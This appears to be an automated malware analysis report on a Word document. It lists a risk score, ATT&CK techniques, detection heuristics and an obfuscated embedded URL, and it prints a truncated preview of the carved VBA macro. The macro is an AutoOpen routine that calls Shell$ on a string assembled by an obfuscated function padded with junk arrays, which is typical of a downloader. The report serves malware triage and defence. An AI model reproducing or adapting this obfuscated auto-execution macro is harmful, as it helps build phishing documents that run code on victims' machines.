MALICIOUS (Risk Score: 184)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine that calls the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a second-stage payload. The obfuscated URL found in the document is suspicious and may be related to the payload delivery.
Heuristics (7)

- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL `http://wwwLdT+LdT.VEY+VEYyouVEY+VEYLdT+LdTrVEY+VLdT+LdTEYflynessVEY+VEY.VELdT+` (in document text, OLE body)
  - URL `http://schemas.openxmlformats.org/drawingml/2006/main` (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 48365 bytes |

SHA-256: d25def6edd515142cc8b47829b96b139d40d8dc58f145e651e6b582942950546

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 44 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HKbHadQwZ"
Sub AutoOpen()
    LANKMSDAs = Array("qAruvjAw", "zIowuZOw", "izBkoWSl", "SukwXprD", "qRvibUqq")
    lqNDjjQbw = Array("LiUBQETh", "FcBvBaHR", "kHcdjWJH", "KwwJOCid", "JzLHWCaN")
    bAWrpvjPF = Array("mwcozSpY", "NqRFKTCu", "YlCOzuih", "PCjzSRPP", "iDcEGoMh")
    Shell$ TUuWrYFBO, 0
    WjJLJHQjU = Array("zRJhBFsP", "vYulpFvb", "BXHrwnjZ", "UsQlWXHl", "zfUAFhhz")
    koLQRvjiN = Array("kHkJpWKi", "kMJpHtXR", "JmKlvVUp", "JHJcTHZL", "mXmQWcJJ")
    KSVUYIcvo = Array("wHIWtSPn", "vziMhPcn", "zDjHGuhd", "BadzzRBi", "OoUzQptE")
End Sub
Function TUuWrYFBO()
    vZEuNst = "M68s5t9ihdMMYCjXoKUZCncfSVONXmvEcmJbADjDfjpoIjsTRavSMqajikJbiqabZfGmsEXkbQuSzoWlcuvzrdslLZtPuIVoJOPdaGaNDKrvvImuNYwnvdjwmVaTKHqSvGIiZtLWUhthlwpDnwBWKhtjVbKW90UDizdq"
    kizJo = Array("IovDYoqh", "RdipbKcK", "ljkbLXYG", "wMjkjLfb", "uXLErbOE")
    ThwTB = Mid(vZEuNst, 13, 140)
    VvOTYN = Array("zPWdIIGU", "pLZizvmq", "WaCTsmim", "shzjwjMM", "wOPbKufi")
    KqHlYWi = "GwwOZcOKaOrv7uhWiSqEfHCwTYApzDVUMbTNjCKqfXfMFUINNcDGCGrMYI"
    oZOvLmiXEDI = Array("lEwajPoR", "iwiujzwu", "ElqpwmVh", "tiQsUhfn", "ZbQYjNiV")
    HVrfjzXTLq = Mid(KqHlYWi, 17, 40)
    jvhWC = Array("bswbVERq", "EZoDWDwl", "NKVCchnN", "lfGiUXfK", "mdjPGalt")
    rkwQv = "EsOzADsGiAoNS7w8s"
    Mqkao = Array("rrcQjsKh", "wCRwwwsj", "XHAEvojt", "KItJWzNZ", "RsDYqpWl")
    jJIctPAslAk = Mid(rkwQv, 8, 6)
    mfzKUalwV = Array("DcNfXJDd", "fSqShZWv", "ruCuPTFF", "iSOPzmHh", "YXCWhRdJ")
    PWizahwRs = "pMTw5fIONFULtJCLbYmjruiRNWVIGpiivlYnOIjIiYB8G"
    wjAJuEiDVYZ = Array("jlbtIkzo", "bouFjvSv", "nUfiwFRj", "WmwiuGlP", "TDtvClBo")
    alQRvBQ = Mid(PWizahwRs, 11, 32)
    ZGjiUYBYFr = Array("YSiEAnIt", "iAMIkwmH", "VSFdjdfK", "ZRpCbwiZ", "KFBjWGwB")
    zIafil = "WYB3ffFmh06q38pwodpcDbwOCYRkCtkiuREaZsccVVCUJzqQobwNNMiqDXXbhXTRwbQqMwJvBMHi0i"
    KRMvapPqX = Array("piclwmmm", "pOqYuBLc", "WcbVBGDt", "QlmpDwZB", "wQjDnbSa")
    sZRBcilJzS = Mid(zIafil, 17, 60)
    zZWzrnECM = Array("tjsoNjoD", "APbGOjBA", "GGjZmQNP", "NriiAGzp", "TZcDbFHT")
    SnwWP = "9Aw3IQ9YzGIJXNfquDANwnwDuZcQQkZowJGoAaMrQiGfrdDELlAzLREFORAKhBZvNdZLHrpUrJwShQLQVYFfjbdfEAZjaCKOFKSNDrzUvjGBUmXzFjoIvuLlAtHGRGuoziMXwzMdbljDVbLScbdrNBTKwjNKkqCplRBmZAzHWKhJLIQZiRcXwdd1ViMUQBFimncZ"
    YAdFMUn = Array("SNfRjloB", "ZIrLVDmY", "UVtimsqk", "dLzZnwkh", "ahIoliWZ")
    WjvFzNZkim = Mid(SnwWP, 14, 164)
    watiPPPTzzh = Array("qUbDQbWM", "wAYEFIaH", "NBvaBRAF", "KmodVNWN", "FjUiWfaO")
    bpDrSPCzcJ = "1jfibbbEjijvVCz8IqGAZ0A2QKdmLsCTUvdABlJaKzBCzLGXVYSZuhspTBzsprRfWkpEtUiiAKJWzpqMnwcnZdZmCnhzoQkTiWjPVCiAtoYjYVqdLkEtOdFtKDBFnfqjZqocHwU9wdzT"
    jpWfdi = Array("OHjNjvrA", "jzcNpDtQ", "pjiNhdNd", "wYLZtwwC", "jAzRTtPO")
    KnrXzhbrXnV = Mid(bpDrSPCzcJ, 29, 104)
    tKzFIr = Array("Twirljvd", "FiRruwni", "YaoLZCGv", "JYBSQblt", "fVEpkWro")
    uLiQWutrjKj = "5JPcR2t1TcpIiYZwYJamELkmvjUcFjfajzUdZAkstMjXdFzHzlzjAvviohkGFhOCzPciDwZYYisscMIpmMfThwZlDqorPimLzjZOdOEBMaHSCDCbZuTtCvVwqriMHhJuvjuvmuMYHdHGqR44sRo01DuIRbVNk"
    RMCqwI = Array("LZvsEkSM", "pTmnYFdF", "LzPvPtIT", "TWmkTdts", "VTNVUivF")
    GjnziCcWz = Mid(uLiQWutrjKj, 10, 132)
    pcQGlLqGNJM = Array("UizFzzOF", "tNXNdHiN", "tEVZuPXz", "qDhUwZtB", "bsnBUBiB")
    MRSojT = "ohjmmillwqZm8izNNvzDjdhJiOfwcIAYIbqqzPncXzORFkGimpzufTviYKazhjbzChikoGOzIXjjOPDwHzJmLFtpjISopnvqYQOYBVujbOmBLw59Z1BGz"
    DZRPpMBfjj = Array("ojXvErap", "CJSwboZV", "lOoiAdGq", "sRwvXZoV", "twEEAiCF")
    iMicdU = Mid(MRSojT, 14, 92)
    SpAqjAf = Array("tQVlnVFi", "hvEsGMHC", "cSDsoXiG", "zIVcbrDm", "uKpiNGYE")
    XTHQP = "VMElTmpowOVWnZwh3MJj9R8Qq1wFbI1pBpTiRvzJiTiYOmFWCdZXtCkWXJvTprtzWALvm"
    LzLaiQwiCpz = Array("tDhruBXz", "WsIFqoiW", "VtEiDSCM", "klDOiKjw", "wSjzCfWw")
    jLtFFSJrz = Mid(XTHQP, 35, 32)
    ASIqYcL = Array("GrJDcpDz", "vsaTfPME", "NzzcDjWQ", "zumkziIp", "PRjBUOAi")
    nEiUtWQ = "MOM3QGC36RzPmMVmGASkWdCpzVOQflOnXitwKCfKqjZVFUTzZUttBOoQZlwVKTLtGvjAcZbDVHuqEhjiBPqLrVmJpdXZEJAWUjPKkTWAspYuTwIGkm5FcGq1ATo7cbB"
    XiNiAsqdn
```

... (truncated)